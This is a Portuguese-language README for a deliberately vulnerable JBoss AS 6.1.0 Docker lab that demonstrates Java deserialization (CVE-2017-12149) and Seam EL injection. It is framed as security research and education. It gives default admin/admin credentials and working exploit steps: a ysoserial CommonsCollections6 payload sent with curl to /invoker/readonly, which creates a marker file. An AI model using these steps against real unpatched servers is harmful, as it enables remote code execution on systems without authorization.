
Laboratório de pesquisa containerizado do JBoss AS 6.1.0 para demonstrar Java Deserialization (CVE-2017-12149) e vulnerabilidades de JBoss Seam EL Injection, com etapas de verificação de exploração pré-configuradas.
Muitas indústrias críticas (bancos, saúde e manufatura) dependem de middleware legado que foi construído para ser executado especificamente no JBoss 5 ou 6. Como esses aplicativos são frequentemente frágeis demais para migrar para versões modernas do WildFly (o sucessor do JBoss), as organizações optam por "isolar" ou escondê-los atrás de VPNs em vez de corrigi-los. Quando essas defesas de perímetro falham, a vulnerabilidade ainda está lá, viva e sem correção.
Este repositório fornece um ambiente containerizado do JBoss Application Server 6.1.0 especificamente configurado para pesquisa de segurança e verificação de vulnerabilidades. Ele foi projetado para demonstrar falhas de Desserialização Java e Injeção de EL do JBoss Seam.
Para garantir que as credenciais e configurações personalizadas sejam aplicadas corretamente, construa o container do zero:
docker-compose build --no-cache
docker-compose up -d
Console JBoss: http://localhost:8080/admin-console/
Usuário: admin
Senha: admin
Vulnerabilidades Verificadas
O caminho de exploração mais confiável neste ambiente é através do HTTPServerILServlet localizado em /invoker/readonly.
Passos de Verificação:
Gere um payload usando ysoserial para criar um arquivo em /tmp:
java -jar ysoserial-all.jar CommonsCollections6 "touch /tmp/pwned" > poc.ser
Envie o payload binário via curl:
curl -v -X POST --data-binary @poc.ser http://localhost:8080/invoker/readonly
Confirme que a exploração funcionou:
docker exec -it jboss-custom-lab ls /tmp/pwned
Aviso de Segurança Este ambiente é intencionalmente vulnerável. Ele contém software sem correções, de fim de vida.
NÃO implante isso em um servidor público.
NÃO use essas ferramentas em sistemas que você não tem permissão explícita para testar.
Desenvolvido para fins educacionais e pesquisa de segurança.
Dependências: https://github.com/frohoff/ysoserial